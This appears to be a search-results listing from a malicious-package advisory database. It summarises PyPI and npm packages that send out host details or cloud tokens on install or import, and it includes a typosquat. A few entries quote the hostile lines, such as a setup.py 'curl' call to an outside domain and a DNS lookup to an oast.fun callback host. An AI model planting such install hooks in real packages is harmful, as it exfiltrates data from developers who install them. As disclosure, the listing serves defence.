270 matches found
Malicious code in epic-build-scripts (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 14d466b50466bb93e6e9130d18e67b680c7255beecafe16043dc5ee51bfec886 On import epicbuildscripts, the package's top-level init spawns a background thread that POSTs a JSON payload containing socket.gethostname, the...
MAL-2026-6593 Malicious code in django-bkvision (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 60f6913309b46f7fc428e08267197a375885efc1b3c5660d7707ef70895f558c setup.py executes a top-level function on pip install that collects host metadata hostname, user, cwd, Python version, platform, pid, timestamp and...
Malicious code in react-dynamic-table-compenent (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c55ead8b66faca1e08b2babafa252da2371b535c010a5c14d8b0d0e2a44aadf8 Package name misspells 'component' as 'compenent', a one-letter typosquat of react-dynamic-table-component. The package's postinstall script runs nod...
MAL-2026-6290 Malicious code in toorc (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2cfd36909e089f17439dd3227c6f5ccef2fef2964dc26bbdbaaef0481b54615d On pip install and even pip download, the package's setup.py overrides the install and egginfo commands to execute a RunCommand routine that serializ...
MAL-2026-6262 Malicious code in inversiones-common (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 347a767ebbbb5843e6b005c167d98c9ab7b3ea943fadd88401682f2a2b14b2a4 setup.py executes a beacon function at module top level before setup is called, so the payload fires automatically on pip install inversiones-common...
MAL-2026-5812 Malicious code in hello-test-s1 (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e168a49ebd07050fbf35d1cd9714b289903c0593b9bdef27874f975be60461b7 The package was found to contain malicious code or consuming dependency that contains malicious code Source: kam193...
MAL-2026-5811 Malicious code in gigl-core (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 28903f76bed2e89a18c9c276d62c95bb089a091020f89f35f7d2800ef6a3bce3 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in databricks-tools-core (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 9ecf172545ef84f1fcbeeae028a55d2bb570d68a3356a26526269e267f184a10 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in mlir-aie (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 b322e48aca1ca0a746c94d2a935756a1303b61a1530cf39bedf9f75097269bad Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in ckanext-dms (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 5bce6d55a65fbab98cd93d6109b563f49e9557b542a8b9c2fd68e25755b7089e Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
MAL-2026-5768 Malicious code in bash8 (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e665213ba552605420b2269888e041b8b8af4c9e8314d731a8aa246f0fefd748 Package is published as 'bash8' matching an existing PyPI bash linter but installs a top-level module named 'cacertificates' whose only content is a...
MAL-2026-5702 Malicious code in flexitest (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 17f4bae10d193f8128f50dd3010d283dc89016fa468fc8d9b428b5183c505b27 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
MAL-2026-5698 Malicious code in nagios-xi (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c11c80cc2d314460d61a649c84fd75881388470382be8183b77b362e562a5c7f On import nagiosxi, the package's init.py lines 5-8 invokes socket.gethostbyname"atlass-check.autaeqjhfowvnnmkwhxjtq8x39d8nder1.oast.fun" inside a...
Malicious code in hello-dynamic (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d1532f25a13ed2c77496e590acadc24df4fa7d063e707c53687143a7457e2d2e hello-dynamic 0.1.2 is a near-empty package whose init.py only defines a hello function printing 'Hello!'. Its setup.cfg declares a dependencylinks...
Kernel-Exploit-Dojo-239
Kernel-Exploit-Dojo-239 CTF kernel exploitation notes, PoCs,...
Linux-privesc-PoC
Linux Privilege Escalation PoC Lab Educational disclaimer...
MAL-2026-5120 Malicious code in redteam-qxz7-utils (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 855b67c0cf1aaed6f5e0ce3a67478a20cd4244c56424002feeeb0dea1a875848 During installation, the package exfiltrates cloud tokens from the environment. --- Category: MALICIOUS - The campaign has clearly malicious intent, like...
MAL-2026-4809 Malicious code in baidubsrc (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd setup.py executes os.system"curl xiangyangt.com/pypi" unconditionally during pip install. This is an unauthenticated plaintext HTTP request to a...
Malicious code in baidubsrc (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd setup.py executes os.system"curl xiangyangt.com/pypi" unconditionally during pip install. This is an unauthenticated plaintext HTTP request to a...
MAL-2026-4353 Malicious code in mistral-workflows (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 845e7d9c00baa23350d566fee80621733db4faa141eea3f1f983d86b15fb020a Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...